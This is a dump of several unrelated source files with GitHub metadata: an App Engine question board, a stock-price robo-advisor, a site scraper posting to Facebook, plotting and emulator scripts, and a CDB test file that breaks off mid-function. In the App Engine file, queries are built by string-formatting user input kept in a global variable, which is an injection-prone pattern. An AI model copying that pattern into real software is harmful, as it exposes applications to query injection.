blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 2
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
69
| license_type
stringclasses 2
values | repo_name
stringlengths 5
118
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
63
| visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 2.91k
686M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 213
values | src_encoding
stringclasses 30
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 2
10.3M
| extension
stringclasses 246
values | content
stringlengths 2
10.3M
| authors
listlengths 1
1
| author_id
stringlengths 0
212
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
22fab3bbf030b5a3ee3da3004cce910e674b303c
|
28ea6fff3662fbc52fe349ca8d647b5b5fe268a5
|
/src/helloworld.py
|
7961f6eb5b2d904d09496fd4465b0879741044f8
|
[] |
no_license
|
shivarajp/PopTheQuery
|
bbc13363005853d36d41701aeaf1b716d4e22776
|
9c1caa9696488a64dce9aa5a48b786c80773ead9
|
refs/heads/master
| 2021-01-19T05:47:06.126672
| 2014-09-27T14:12:25
| 2014-09-27T14:12:25
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,627
|
py
|
import wsgiref.handlers
from google.appengine.api import users
from google.appengine.ext import webapp
from google.appengine.ext import db
from google.appengine.ext.webapp.util import run_wsgi_app
from google.appengine.ext.webapp import template
global title
class Register(db.Model):
section=db.StringProperty(required="true")
qtn=db.StringProperty(required="true")
class visitors(db.Model):
Name=db.StringProperty(required="true")
Email=db.StringProperty(required="true")
class comments(db.Model):
title=db.StringProperty(required="true")
comment=db.StringProperty(required="true")
class MainPage(webapp.RequestHandler):
def get(self):
user = users.get_current_user()
if user:
greeting = ('Welcome, %s! (<a href="%s">sign out</a>)' %
(user.nickname(), users.create_logout_url('/')))
else:
greeting = ('<a href="%s">SIGN IN WITH GOOGLE ACCOUNT :)</a>.' %
users.create_login_url('/'))
self.response.out.write('<html><body>%s</body></html>' % greeting)
class Homepage(webapp.RequestHandler):
def get(self):
self.response.out.write(template.render('index.html',{}))
class register(webapp.RequestHandler):
def get(self):
self.response.out.write(template.render('raisequestion.html',{}))
def post(self):
shoutt= Register(section=self.request.get('txt1'),qtn=self.request.get('qtn'))
shoutt.put()
self.response.out.write(template.render('raisequestion.html',{}))
class popthequery(webapp.RequestHandler):
def get(self):
shouts= db.GqlQuery('select * from Register')
values={'shouts':shouts}
self.response.out.write(template.render('popthequery.html',values))
def post(self):
global title
title=self.request.get('quest')
self.redirect("/reply")
class raisequestion(webapp.RequestHandler):
def get(self):
self.response.out.write(template.render('raisequestion.html',{}))
def post(self):
self.response.out.write(template.render('raisequestion.html',{}))
class display(webapp.RequestHandler):
def get(self):
self.response.out.write(template.render('display.html',{}))
class aboutus(webapp.RequestHandler):
def get(self):
self.response.out.write(template.render('aboutus.html',{}))
class contactus(webapp.RequestHandler):
def get(self):
self.response.out.write(template.render('contactus.html',{}))
class reply(webapp.RequestHandler):
def get(self):
shouts= db.GqlQuery("select * from comments where title = '%s'" % title)
sh1=db.GqlQuery("select * from Register where section = '%s'" % title)
values={'shouts':shouts,'sh1':sh1}
self.response.out.write(template.render('reply.html',values))
def post(self):
shoutt= comments(title=self.request.get('ques'),comment=self.request.get('qtn'))
shoutt.put()
self.response.out.write(template.render('index.html',{}))
application = webapp.WSGIApplication([('/', Homepage),('/MainPage', MainPage),('/register', register),('/popthequery',popthequery),('/reply', reply),('/aboutus', aboutus),('/contactus', contactus)], debug=True)
def main():
run_wsgi_app(application)
if __name__ == "__main__":
main()
|
[
"shivrajp130@gmail.com"
] |
shivrajp130@gmail.com
|
20b411857018d423476fddd690fa0329d50115f5
|
e851ab438384ca775cff31633f2974abf98f581b
|
/app/robo_advisor.py
|
1a2a868218094423af3f41266bc36b675f3a7b38
|
[] |
no_license
|
melissawelty/robo-advisor
|
7c7c8282c912ac174cda48c0c3b1ffce04890edb
|
febc41ce0c4695def1712adc3929ae0639357cec
|
refs/heads/master
| 2022-11-06T21:41:03.952316
| 2020-06-25T21:09:12
| 2020-06-25T21:09:12
| 270,390,612
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,601
|
py
|
# app/robo_advisor.py
import csv
import json
import os
from dotenv import load_dotenv
import requests
from datetime import datetime
import matplotlib.dates as mdates
import matplotlib.pyplot as plt
from matplotlib.dates import DateFormatter
load_dotenv()
def to_usd(my_price):
# return "${0:,.2f}".format(my_price)
return f"${my_price:,.2f}"
# INPUTS
api_key = os.environ.get("ALPHAVANTAGE_API_KEY")
symbol = input("Please enter a stock symbol and press enter:")
request_url = f"https://www.alphavantage.co/query?function=TIME_SERIES_DAILY&symbol={symbol}&apikey={api_key}"
response = requests.get(request_url)
if 'Error' in response.text:
print("Invalid Symbol. Please enter valid stock symbol.")
exit()
parsed_response = json.loads(response.text)
last_refreshed = parsed_response["Meta Data"]["3. Last Refreshed"]
tsd = parsed_response["Time Series (Daily)"]
dates = list(tsd.keys()) #sort to ensure latest day is first, assuming latest day is first
latest_day = dates[0]
latest_close = tsd[latest_day]["4. close"]
#max of all high prices
high_prices = []
low_prices = []
for date in dates:
high_price = tsd[date]["2. high"]
low_price = tsd[date]["3. low"]
high_prices.append(float(high_price))
low_prices.append(float(low_price))
recent_high = max(high_prices)
recent_low = min(low_prices)
# OUTPUTS
csv_filepath = os.path.join(os.path.dirname(__file__), "..", "data", "prices.csv")
csv_headers = ["timestamp", "open", "high", "low", "close", "volume"]
with open(csv_filepath, "w", newline="") as csv_file:
writer = csv.DictWriter(csv_file, fieldnames=csv_headers)
writer.writeheader()
for date in dates:
daily_prices = tsd[date]
writer.writerow({
"timestamp": date,
"open": daily_prices["1. open"],
"high": daily_prices["2. high"],
"low": daily_prices["3. low"],
"close": daily_prices["4. close"],
"volume": daily_prices["5. volume"]
})
print("-------------------------")
print(f"SELECTED SYMBOL: {symbol}")
print("-------------------------")
print("REQUESTING STOCK MARKET DATA...")
now = datetime.now()
date_time = now.strftime("%D, %r")
print("REQUEST AT:" + date_time)
print("-------------------------")
print(f"LATEST DAY: {last_refreshed}")
print(f"LATEST CLOSE: {to_usd(float(latest_close))}")
print(f"RECENT HIGH: {to_usd(float(recent_high))}")
print(f"RECENT LOW: {to_usd(float(recent_low))}")
print("-------------------------")
if float(latest_close) > (float(recent_high) * .75):
print("RECOMMENDATION: DON'T BUY! The stock price is too high and not a good investment.")
elif float(latest_close) < (float(recent_low) * 1.15):
print("RECOMMENDATION: BUY AND HOLD! The price is low and could generate high returns when it increases!")
else:
print("RECOMMENDATION: DON'T BUY! Keep watching, this could be a potential buy soon..")
print("-------------------------")
print(f"WRITING DATA TO CSV: {csv_filepath}...")
print("-------------------------")
print("HAPPY INVESTING!")
print("-------------------------")
x = []
y = []
with open(csv_filepath, 'r') as csvfile:
rows=csv.reader(csvfile, delimiter=",")
next(rows)
for row in rows:
x.append(row[0])
y.append(float(row[4]))
plt.figure(figsize = (15,6))
plt.plot(x,y,marker='o')
plt.title('Data from Prices')
plt.xlabel('Date')
plt.xticks(rotation=45)
plt.ylabel('Price in USD')
ax = plt.gca()
# date_form = DateFormatter("%m-%d")
# ax.xaxis.set_major_formatter(date_form)
ax.invert_xaxis()
plt.show()
|
[
"65548626+melissawelty@users.noreply.github.com"
] |
65548626+melissawelty@users.noreply.github.com
|
a45c45ce54e0b683e4ef570b1e30e63d1106162e
|
94c6c148450cdfc85ff3957c9fc9af6d960ed038
|
/cron_jobs/archery_org_hk_spider.py
|
61d8922e04fe5fbdc34b71b196cccf88615d08ac
|
[] |
no_license
|
samwalker505/archery_news
|
d4fba46de6da1e43672770beaf7530a021d34d27
|
2caa29ad9bc2119913c2e85093593e62ce62b2ae
|
refs/heads/master
| 2021-01-11T18:36:03.311848
| 2017-01-30T14:05:14
| 2017-01-30T14:05:14
| 79,579,959
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,446
|
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import re
import md5
from google.appengine.api import urlfetch
from google.appengine.ext import ndb
import webapp2
import logging
from lxml import etree
from handlers import BaseHandler, Output
from models.post import ArcheryOrgHkPost
from external_api.facebook import Facebook as FacebookApi
class ArcheryOrgHkSpiderHandler(BaseHandler):
def create_post(self, post, client):
post_content = []
title = post.title or ''
content = post.content.replace('\n', '%0A') or ''
tag_arr = [u'%23{}'.format(tag) for tag in post.tags]
tags = u'%20'.join(tag_arr)
if title:
post_content.append(title)
if content:
post_content.append(content)
if tags:
post_content.append(tags)
post_fb_content = u'%0A'.join(post_content)
logging.debug('entered')
logging.debug(post_fb_content)
link = '{}/archery_org_hk?post_id={}'.format(self.request.host_url, post.key.id())
result = client.create_post(post_fb_content, link)
@Output.json
def get(self, *args, **kwargs):
pageNum = 0
url_format = 'https://www.archery.org.hk/frontpage?page={}'
url = url_format.format(pageNum)
results = []
while url:
get_result = urlfetch.fetch(url)
page = etree.HTML(get_result.content)
for row in page.xpath('//div[contains(@class, "views-row")]'):
title = row.xpath('descendant::h2/a/text()')[0]
url = row.xpath('descendant::h2/a/@href')[0]
tags = row.xpath('descendant::div[@class="terms"]//text()')
tags = [tag for tag in tags if tag != '\n']
contentRaw = row.xpath('descendant::div[contains(@class, "content")]//text()')
content = u''.join(contentRaw) if contentRaw else u''
content = re.sub(r' +', u' ', content)
content = re.sub(r'(\n ?)+', u'\n', content)
content = content.strip()
content = content.encode('utf-8')
result = {
'title': title,
'url': url,
'tags': tags,
'content': content,
'content_hash': md5.new(content).hexdigest(),
'url_hash':md5.new(url).hexdigest(),
}
results.append(result)
if page.xpath('//li[contains(@class, "pager-last")]'):
pageNum += 1
url = url_format.format(pageNum)
else:
url = None
logging.debug('done fetching')
result_ids = ['{}:{}'.format(r['url_hash'], r['content_hash']) for r in results]
keys = [ndb.Key(ArcheryOrgHkPost, str(rid)) for rid in result_ids]
created_posts = ndb.get_multi(keys)
to_create = [r for r, p in zip(results, created_posts) if not p]
if to_create:
created_post_keys = ArcheryOrgHkPost.create_from_spider_batch(to_create)
created_posts = ndb.get(created_post_keys)
client = FacebookApi()
for post in created_posts:
self.create_post(post, client)
else:
logging.debug('no to create')
return {}
app = webapp2.WSGIApplication([
(r'/api/v1/cron_jobs/archery_org_hk_spider', ArcheryOrgHkSpiderHandler),
])
|
[
"samwalker505@gmail.com"
] |
samwalker505@gmail.com
|
510df31dcea0e95031d017d93c8fd93e7231355f
|
af3904eecec7e41fcb530213b6e6c9f8d4c12c08
|
/flask010/bin/flask
|
a42ec0ab16bb3b87ff2b9c59f25ce4ffdbaecfd8
|
[] |
no_license
|
Besom01/homeworks
|
076232963e8c05e2eabc6183ec13061465afb8be
|
77c739b4b30819d9a369a24edc5b67de5920ad50
|
refs/heads/master
| 2021-06-19T23:23:41.914326
| 2019-08-07T11:03:50
| 2019-08-07T11:03:50
| 196,199,449
| 0
| 0
| null | 2021-03-20T05:14:30
| 2019-07-10T12:15:48
|
Python
|
UTF-8
|
Python
| false
| false
| 247
|
#!/home/danger/Desktop/pyprojects/flask010/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from flask.cli import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"ganjubasman007@gmail.com"
] |
ganjubasman007@gmail.com
|
|
317cc5c1fca1faac48fbd217fee8bfa5624b2b88
|
29310445b330844d734f38147d1e2b91d2610bc9
|
/OOP_Pre/codeup/1031.py
|
8d4f40ce5b0d352da17b5431f7a64c6bf722e431
|
[] |
no_license
|
itsss/vacation_2018-1
|
1bbfd67a169db3d9f9b6aefe604d9131dd8fdeb3
|
500a37a90617820628c44d0c5fbe0c5c200ac0d0
|
refs/heads/master
| 2020-03-24T00:14:24.123319
| 2018-08-14T04:35:40
| 2018-08-14T04:35:40
| 142,281,181
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 211
|
py
|
#a = int(input())
#print(int(oct(a)[2:].zfill(2)))
#a = int(input())
#print(hex(a)[2:])
#a = int(input())
#print("%X" % (a))
#a = input()
#print(int(a, 8))
a = input()
b = int(a, 16)
print("{0:o}".format(b))
|
[
"itschool@itsc.kr"
] |
itschool@itsc.kr
|
af8be67c9523b7c72402ebfb98233114ede9d5e6
|
6e155ed62ef6d24cb1219d086a7d695abc283bc0
|
/plugins/wascan/parse_wascan.py
|
78f2c502a2d437d6d71f160b1ab22faa5b7e8981
|
[] |
no_license
|
linpengstc/pentest
|
9c928ab2d62a406ca79db80818d8f668dcdf751c
|
f4e94141f740aedc6417f52488a0f1b2f4864174
|
refs/heads/master
| 2020-03-10T05:54:29.668808
| 2018-04-13T03:42:17
| 2018-04-13T03:42:17
| 129,227,530
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,004
|
py
|
import pprint
import sqlite3
def parse_result():
results = []
with open("out/wascan/wascan.result") as f:
r = {}
for l in f:
l = l.strip()
if l.startswith("[+] URL:"):
if r != {}:
results.append(r)
r = {}
r['url'] = l.replace("[+] URL:", "").strip()
r['info'] = []
else:
r['info'].append(l)
# results.append(r)
pprint.pprint(results)
return results
def save(datas):
conn = sqlite3.connect("report/data.db")
cur = conn.cursor()
cur.execute('DROP TABLE IF EXISTS webinfo')
cur.execute("create table webinfo (url varchar(100), info varchar(10000))")
for d in datas:
cur.execute("insert into webinfo(url, info) values(?,?)", (d['url'], "\n".join(d['info'])))
conn.commit()
conn.close()
if __name__ == "__main__":
results = parse_result()
save(results)
|
[
"linpeng@weidian.com"
] |
linpeng@weidian.com
|
a1d17058046e65d78f34d700c70b3d7e984347cf
|
25e0d42a524ac20fbda7355ac4825f3510eb2f0c
|
/all/130/final_routes/special/PlotSiTensor
|
0c4e200c4e9504a7d721e48ffeca50f1a6f54851
|
[] |
no_license
|
lucydot/data
|
d3f1fa7645f3eb32b2cddbdf78c382a964533f06
|
08bd49bbf768cf867dce0bf8393c25b9583b9723
|
refs/heads/master
| 2021-01-10T22:53:59.672517
| 2016-10-11T09:44:41
| 2016-10-11T09:44:41
| 70,342,058
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,088
|
#!/usr/bin/env python
# region: Imports
import csv;
import math;
import os;
import numpy as np;
import matplotlib as mpl;
import matplotlib.pyplot as plt;
import matplotlib.ticker as tck;
from scipy.interpolate import splrep, splev
#EndRegion
#Region:Parameters
InputFiles = [
("./", "OUTCAR"),
]; # This code allows multiple files to be read in.
# Each file read in will have a different coloour band structure.
OutputFileName = "Si_Tensor_LDA_0.005_130_special.png";
BandPaths = [
[
## FCC cubic lattice
# ((0.0, 0.0, 0.0), r"$\Gamma$"),
# ((0.5, 0.0, 0.5), "X"),
# ((0.5, 0.25, 0.75), "W"),
# ((0.375, 0.375, 0.75), "K"),
# ((0.0, 0.0, 0.0), r"$\Gamma$"),
# ((0.5, 0.5, 0.5), "L"),
# ((0.625, 0.25, 0.625), "U"),
# ((0.5, 0.25, 0.75), "W"),
# ((0.5, 0.5, 0.5), "L"),
# ((0.625, 0.625, 0.75), "K")
## Tetragonal lattice
# ((0.0, 0.0, 0.0), r"$\Gamma$"),
# ((0.0, 0.5, 0.00), "X"),
# ((0.5, 0.5, 0.0), "M"),
# ((0.0, 0.0, 0.0), r"$\Gamma$"),
# ((0.0,0.0,0.5), "Z"),
# ((0.0,0.5,0.5), "R"),
# ((0.5,0.5,0.5), "A"),
# ((0.0,0.0,0.5),"Z")
## Simple cubic
((0.484, 0.0, 0.484), "0.484,0,0.484"),
((0.484, 0.5, 0.484), "0.484,0.5,0.484")
],
# [
# ((0.625, 0.250, 0.625), "U"),
# ((0.500, 0.000, 0.500), "X")
# ]
];
ReciprocalLatticeVectors = [
(1.1569113, 1.1569113, 1.1569113),
(1.1569113, -1.1569113, -1.1569113),
(-1.1569113, 1.1569113, -1.1569113),
];
UseInterpolation = False; #This uses a scipy routine to interpolate between k-points
Colors = [(0, 0, 255), (128, 0, 255), (255, 0, 255), (255, 0, 128), (255, 0, 0), (255, 128, 0)]
# If only one file being plotted, amend first entry to change colour of plot
#EndRegion
#Region: Functions
def _ReadBandEnergies(filePath):
bandEnergies = [];
inputReader = open(filePath, 'rU');
inputReaderCSV = csv.reader(inputReader);
next(inputReaderCSV);
next(inputReaderCSV);
for row in inputReaderCSV:
bandEnergies.append([float(row[i]) for i in range(1, len(row), 2)]);
inputReader.close();
return bandEnergies;
def _ReadKPoints(filePath):
kPointCoordinates = [];
inputReader = open(filePath, 'rU');
inputReaderCSV = csv.reader(inputReader);
next(inputReaderCSV);
for row in inputReaderCSV:
kPointCoordinates.append((float(row[1]), float(row[2]), float(row[3])));
inputReader.close();
return kPointCoordinates;
#EndRegion
#Region: Main
#COMMENT: Unpack the reciprocal lattice vectors - used in the next two subsections.
(r1X, r1Y, r1Z), (r2X, r2Y, r2Z), (r3X, r3Y, r3Z) = ReciprocalLatticeVectors;
#COMMENT: Prepare the x-axis ticks positions and labels.
specialPointDistances = [0.0];
specialPointLabels = [];
for bandPath in BandPaths:
for i in range(1, len(bandPath)):
(kx1, ky1, kz1), label1 = bandPath[i - 1];
(kx2, ky2, kz2), label2 = bandPath[i];
kDistanceX = (kx2 * r1X + ky2 * r2X + kz2 * r3X) - (kx1 * r1X + ky1 * r2X + kz1 * r3X);
kDistanceY = (kx2 * r1Y + ky2 * r2Y + kz2 * r3Y) - (kx1 * r1Y + ky1 * r2Y + kz1 * r3Y);
kDistanceZ = (kx2 * r1Z + ky2 * r2Z + kz2 * r3Z) - (kx1 * r1Z + ky1 * r2Z + kz1 * r3Z);
pathLength = math.sqrt(kDistanceX ** 2 + kDistanceY ** 2 + kDistanceZ ** 2);
specialPointDistances.append(specialPointDistances[-1] + pathLength);
if i == 1:
if len(specialPointLabels) == 0:
specialPointLabels.append(label1);
specialPointLabels.append(label2);
else:
specialPointLabels[-1] = specialPointLabels[-1] + "|" + label1;
specialPointLabels.append(label2);
else:
specialPointLabels.append(label2);
#COMMENT: Prepare sets of data for plotting.
plotSets = [];
for i in range(0, len(InputFiles)):
basePath, prefix = InputFiles[i];
kPoints = _ReadKPoints(os.path.join(basePath, "{0} - K-Points.csv".format(prefix)));
bandEnergies = _ReadBandEnergies(os.path.join(basePath, "{0} - Band Energies.csv".format(prefix)));
kPointDistances = [0.0];
for j in range(1, len(kPoints)):
kx1, ky1, kz1 = kPoints[j - 1];
kx2, ky2, kz2 = kPoints[j];
kDistanceX = (kx2 * r1X + ky2 * r2X + kz2 * r3X) - (kx1 * r1X + ky1 * r2X + kz1 * r3X);
kDistanceY = (kx2 * r1Y + ky2 * r2Y + kz2 * r3Y) - (kx1 * r1Y + ky1 * r2Y + kz1 * r3Y);
kDistanceZ = (kx2 * r1Z + ky2 * r2Z + kz2 * r3Z) - (kx1 * r1Z + ky1 * r2Z + kz1 * r3Z);
pathLength = math.sqrt(kDistanceX ** 2 + kDistanceY ** 2 + kDistanceZ ** 2);
kPointDistances.append(kPointDistances[-1] + pathLength);
interpolatedKPointDistances = None;
interpolatedBandEnergies = None;
if UseInterpolation:
interpolatedKPointDistances = np.linspace(specialPointDistances[0], specialPointDistances[-1], len(kPointDistances) * 10);
interpolatedBandEnergies = [];
for band in bandEnergies:
tck = splrep(kPointDistances, band);
interpolatedBandEnergies.append(splev(interpolatedKPointDistances, tck));
plotSets.append((kPointDistances, bandEnergies, interpolatedKPointDistances, interpolatedBandEnergies));
#COMMENT: Plot and save the data.
mpl.rc('font', **{ 'family' : 'serif', 'size' : 14, 'serif' : 'Arial' });
plt.figure(figsize = (12/ 2.54, 12 / 2.54)); #2.54 cm in an inch - matplotlib uses inches
for i in range(0, len(plotSets)):
kPointDistances, bandEnergies, interpolatedKPointDistances, interpolatedBandEnergies = plotSets[i];
r, g, b = Colors[i];
if interpolatedKPointDistances != None:
for j in range(0, len(bandEnergies)):
# plt.scatter(kPointDistances, bandEnergies[j], 3, facecolor = 'none', edgecolor = (r / 255.0, g / 255.0, b / 255.0), linewidth = 0.5);
plt.plot(interpolatedKPointDistances, interpolatedBandEnergies[j], color = (r / 255.0, g / 255.0, b / 255.0), linewidth = 1.0);
else:
for band in bandEnergies:
plt.plot(kPointDistances, band, color = (r / 255.0, g / 255.0, b
/ 255.0), linewidth = 1.0);
#matplotlib likes rgb colors as a decimal
plt.xlim((specialPointDistances[0], specialPointDistances[-1]));
plt.ylim((-5, 5)); # change to plot over larger energy interval
plt.xticks(specialPointDistances, specialPointLabels);
plt.yticks([-5.0, -2.5, 0, 2.5, 5]);
plt.xlabel("Wave vector k") #
plt.ylabel ("Energy (eV)") # you can use latex (r"$\mathit{E - E_F}$ / eV")
# plt.title ("CZTS hybrid", fontweight = 'bold')
axes = plt.gca();
axes.get_xaxis().set_tick_params(**{ 'direction' : 'outward', 'top' : 'off'});
axes.get_yaxis().set_tick_params(**{ 'direction' : 'outward', 'right' : 'off'});
axes.get_xaxis().set_tick_params(width = 0.5);
axes.get_yaxis().set_tick_params(width = 0.5);
axes.get_xaxis().grid(color = (211 / 255.0, 211 / 255.0, 211 / 255.0), linestyle = '-', linewidth = 0.5);
# axes.get_yaxis().set_major_formatter(tck.FuncFormatter(lambda value, pos : "{0:.1f}".format(value)));
axes.set_axisbelow(True);
for spine in axes.spines.values():
spine.set_linewidth(0.5);
plt.tight_layout();
plt.savefig(OutputFileName, format = 'png', dpi = 300);
plt.close();
#EndRegion
|
[
"l.whalley@bath.ac.uk"
] |
l.whalley@bath.ac.uk
|
|
7cf14a1904b17c4284ccaf9831aad5334765dde3
|
07d70fa9dc518ef4c7f4d0065ab47b930ef64a05
|
/api_emulator/redfish/memory.py
|
9d49d3a3e1ceccddafc2d5296ec283fd9c5b1cfb
|
[
"BSD-3-Clause"
] |
permissive
|
fetahi/Redfish-Interface-Emulator-1
|
ed5dd0c5a0d8ef820204497e4a99cc38694690e2
|
d89b9a313b6ea6acc85038123fcbe91cf6cf99a0
|
refs/heads/master
| 2021-07-13T02:33:47.331169
| 2017-10-11T15:04:33
| 2017-10-11T15:04:33
| 103,956,434
| 0
| 0
| null | 2017-09-18T15:21:40
| 2017-09-18T15:21:40
| null |
UTF-8
|
Python
| false
| false
| 2,081
|
py
|
# Copyright Notice:
# Copyright 2016 Distributed Management Task Force, Inc. All rights reserved.
# License: BSD 3-Clause License. For full text see link: https://github.com/DMTF/Redfish-Interface-Emulator/LICENSE.md
# Redfish Memorys and Memory Resources. Based on version 1.0.0
from flask_restful import Resource
import logging
from .templates.memory import format_memory_template
members = {}
INTERNAL_ERROR = 500
class Memory(Resource):
"""
Memory.1.0.2.Memory
"""
def __init__(self, **kwargs):
pass
def get(self, ident1, ident2):
resp = 404
if ident1 not in members:
return 'not found',404
if ident2 not in members[ident1]:
return 'not found',404
return members[ident1][ident2], 200
class MemoryCollection(Resource):
"""
Memory.1.0.2.MemoryCollection
"""
def __init__(self, rb, suffix):
"""
Memorys Constructor
"""
self.config = {u'@odata.context': '{rb}$metadata#MemoryCollection.MemoryCollection'.format(rb=rb),
u'@odata.id': '{rb}{suffix}'.format(rb=rb, suffix=suffix),
u'@odata.type': u'#MemoryCollection.MemoryCollection'}
def get(self, ident):
try:
if ident not in members:
return 404
procs = []
for p in members.get(ident, {}).values():
procs.append({'@odata.id': p['@odata.id']})
self.config['@odata.id']='{prefix}/{ident}/Memory'.format(prefix=self.config['@odata.id'],ident=ident)
self.config['Members'] = procs
self.config['Members@odata.count'] = len(procs)
resp = self.config, 200
except Exception,e:
logging.error(e)
resp = 'internal error', INTERNAL_ERROR
return resp
def CreateMemory(**kwargs):
suffix_id = kwargs['suffix_id']
memory_id = kwargs['memory_id']
if suffix_id not in members:
members[suffix_id] = {}
members[suffix_id][memory_id] = format_memory_template(**kwargs)
|
[
"fetahi.wuhib@ericsson.com"
] |
fetahi.wuhib@ericsson.com
|
26f054cc7b5e9732066581e3f243a6f48aaa449f
|
9172ea51864ae8a44631430d5044b14adad94e56
|
/src/problem_001.py
|
1bfa1d86e5bb8c7b2277f887a625730f7e636d79
|
[] |
no_license
|
ShZgZ/MyProjectEuler
|
6cb20e3a8ed8d842cad2b9664b96eeddde48acae
|
8853ab89591be1975e82e47a821a49d1ea469e53
|
refs/heads/master
| 2022-10-22T09:29:57.253819
| 2020-06-08T10:42:06
| 2020-06-08T10:42:06
| 268,762,617
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,186
|
py
|
"""Multiples of 3 and 5
If we list all the natural numbers below 10 that are multiples of 3 or 5, we get 3, 5, 6 and 9. The sum of these multiples is 23.
Find the sum of all the multiples of 3 or 5 below 1000.
和訳:3と5の倍数
10未満の自然数で3と5の倍数は3,5,6,9となり、これらの倍数の和は23となる。
1000未満の3と5の倍数の和を求めよ。
"""
import doctest
def main():
"""
1000未満で3と5の倍数の和を求める。
"""
below_num = 1000
n0 = 3
n1 = 5
result = get_multiples_sum(n0, n1, below_num=below_num)
print(result)
def get_multiples_sum(*numbers: int, below_num: int) -> int:
"""
below_num未満の自然数でnumbersに含まれる数の倍数の和を求める。
:param numbers: 倍数の判定対象となる数字
:param below_num: 最大数
:return: 倍数の和
>>> get_multiples_sum(3, 5, below_num=10)
23
"""
count = 0
for i in range(1, below_num):
for j in numbers:
if i % j == 0:
count += i
break
return count
if __name__ == '__main__':
doctest.testmod()
main() # 233168
|
[
"s.shogo.z89@gmail.com"
] |
s.shogo.z89@gmail.com
|
0323f4528a16c0cda897844c311d5d144cd8dbcb
|
0bf0ed0b69d2a3cbdb9dad664aea6b2c597b5af8
|
/Weather.py
|
93e10beda5d5945918bee5098e04c794ae0ca4a9
|
[] |
no_license
|
Vivianwcao/Lab_1
|
557aa597bb569eca73338b409027f961ebb83254
|
5e9336ebf20544fe477e3aca463f9139a7747b98
|
refs/heads/master
| 2020-12-07T14:18:08.829958
| 2020-01-09T18:56:59
| 2020-01-09T18:56:59
| 232,736,530
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 148
|
py
|
celcius = 10
fahrenheit = 9/5 * celcius + 32
print("Temperature:" + str (celcius) + "degrees")
print("Temperature:" + str (fahrenheit) + "degrees")
|
[
"vivian.w.cao@gmail.com"
] |
vivian.w.cao@gmail.com
|
438c876dfe378cf28adc2d88b1096189e1a9c26b
|
52a1ccbc8147cce7ddaf808e1fc260b76dc4a3e0
|
/test/test_cdbdict.py
|
3ac85b0c78c674c8a3628fb9aa8dc66c5edd8f77
|
[] |
no_license
|
martinbudden/mediawiki2cdb
|
5073ddfe442ae55720737f16b63102c7dc40945e
|
828dd286850545ca8e0453a88f42b413b16b9868
|
refs/heads/master
| 2020-12-24T17:44:54.145353
| 2010-04-28T13:14:20
| 2010-04-28T13:14:20
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,906
|
py
|
"""
CDB dictionary test module.
"""
import unittest
import os
from mediawikicdb.cdbdict import CdbDict, CdbDictIntKey, CdbDictIntValue
#from mediawikicdb import CdbDict, CdbDictIntKey, CdbDictIntValue
class CDBDictTestCase(unittest.TestCase):
"""Basic test for cdbdict."""
def setUp(self):
"""Create directory for testing."""
self.dir = "testcdb/"
if not os.path.exists(self.dir):
os.makedirs(self.dir)
def tearDown(self):
"""No teardown required."""
pass
def test_pageCdbDict(self):
"""Test basic CdbDict functionality"""
filename = "testcdb/temp.cdb"
if os.path.exists(filename):
os.remove(filename)
d = CdbDict(filename)
# test __delitem__
try:
del d[0]
self.assertTrue(False)
except TypeError:
pass
# test __setitem__
try:
d[0] = 0
self.assertTrue(False)
except TypeError:
pass
# test iter
i = d.__iter__()
self.assertEqual(i, i.__iter__())
# test _pack_value and _unpack_value
expected = 'abcde'
result = d._unpack_value(d._pack_value(expected))
self.assertEqual(result, expected)
# test _pack_key and _unpack_key
expected = 'abcde'
result = d._unpack_key(d._pack_key(expected))
self.assertEqual(result, expected)
testPages = {'k1': 'v1', 'k2': 'v2', 'k3': 'v3'}
d.update(testPages)
self.assertEqual(len(d), len(testPages))
for i in testPages:
expected = testPages[i]
result = d[i]
print "i, e, r", i, expected, result
self.assertEqual(result, expected)
os.remove(filename)
def test_intKey(self):
"""Test dictionary with integer key"""
testPages = { \
290: 'A',
3783: 'B',
12266: 'Genetics',
3954: 'Biochemistry',
130495: 'EBay',
6235: 'Cell nucleus',
5507057: 'Deoxyribonuclease I',
7955: 'DNA'}
pageIntFromName = CdbDictIntKey(self.dir + "pageIntKey.cdb")
# test _pack_value and _unpack_value
expected = 'abcde'
result = pageIntFromName._unpack_value(pageIntFromName._pack_value(expected))
self.assertEqual(result, expected)
# test _pack_key and _unpack_key
expected = 1234
result = pageIntFromName._unpack_key(pageIntFromName._pack_key(expected))
self.assertEqual(result, expected)
pageIntFromName.clear()
pageIntFromName.update(testPages)
self.assertEqual(len(pageIntFromName), len(testPages))
for i in testPages:
expected = testPages[i]
result = pageIntFromName[i]
self.assertEqual(result, expected)
pageIntFromName.clear()
self.assertEqual(len(pageIntFromName), 0)
def test_intValue(self):
"""Test dictionary with integer values"""
testPages = { \
'A': 290,
'B': 3783,
'Genetics': 12266,
'Biochemistry': 3954,
'EBay': 130495,
'Cell nucleus': 6235,
'Deoxyribonuclease I': 5507057,
'DNA': 7955}
#writer = mediawikicdbwriter.MediaWikiCdbWriter()
